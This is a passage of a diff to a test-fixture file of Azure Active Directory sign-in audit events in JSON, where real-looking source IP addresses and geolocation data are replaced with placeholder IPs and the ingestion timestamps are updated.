"ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -1188,7 +1026,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -1200,12 +1038,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051503600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970120100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1244,25 +1082,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1276,7 +1096,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -1326,7 +1146,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -1338,12 +1158,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051506500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970123900Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1382,25 +1202,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1414,7 +1216,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -1464,7 +1266,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -1476,12 +1278,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051509300Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970128600Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1520,25 +1322,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1552,7 +1336,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -1602,7 +1386,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1614,12 +1398,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051512500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970133400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1658,25 +1442,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1690,7 +1456,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -1740,7 +1506,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1752,12 +1518,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051515900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970138300Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1796,25 +1562,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1828,7 +1576,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -1878,7 +1626,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -1890,12 +1638,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051518800Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970142Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 